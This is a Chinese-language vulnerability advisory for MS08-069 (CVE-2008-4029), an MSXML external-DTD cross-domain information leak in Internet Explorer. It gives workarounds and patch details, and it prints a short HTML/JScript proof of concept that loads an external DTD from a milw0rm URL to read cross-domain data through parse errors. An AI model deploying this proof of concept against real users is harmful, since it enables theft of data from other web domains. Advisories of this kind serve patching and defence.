Microsoft XML Core Services DTD跨域信息泄露漏洞(MS08-069)
发布日期:2008-11-11
更新日期:2008-11-12
受影响系统:Microsoft XML Core Services 4.0
Microsoft XML Core Services 3.0
描述:
BUGTRAQ ID:
32155
CVE(CAN) ID:
CVE-2008-4029
Microsoft XML Core Services(MSXML)允许使用JScript、VBScript和Visual Studio 6.0的用户开发基于XML的应用,以与其他遵循XML 1.0标准的应用程序交互操作。
Microsoft XML Core Services处理外部文档类型定义(DTD)的错误检查的方式中存在一个信息泄露漏洞。如果用户浏览包含特制内容的网站或打开特制HTML电子邮件,此漏洞可能允许用户读取另一个Internet Explorer域中的网页的数据。
<*来源:Gregory Fleisher
链接:
http://secunia.com/advisories/23655
http://www.microsoft.com/technet/security/bulletin/ms08-069.mspx?pf=true
http://www.us-cert.gov/cas/techalerts/TA08-316A.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<body>
KB955218 - CVE-2008-4029 - JA
<script type="text/javascript">
var dom = new ActiveXObject("Msxml2.DOMDocument.3.0");
dom.async = false;
var url = "
http://www.milw0rm.com/forfun.dtd";
var xml = "<!DOCTYPE pwn SYSTEM '" + url + "'>";
if (dom.loadXML(xml) == 0)
{
alert("Blue or Red Pill? " + dom.parseError.srcText);
}
</script>
</body>
</html>
建议:
临时解决方法:
* 将Internet Explorer配置为在Internet和本地Intranet安全区域中运行ActiveX控件之前进行提示。
* 将Internet 和本地Intranet安全区域设置设为“高”,以便在这些区域中运行ActiveX控件和活动脚本之前进行提示。
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS08-069)以及相应补丁:
MS08-069:Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution (955218)
链接:
http://www.microsoft.com/technet/security/bulletin/ms08-069.mspx?pf=true浏览次数:2992
严重程度:0(网友投票)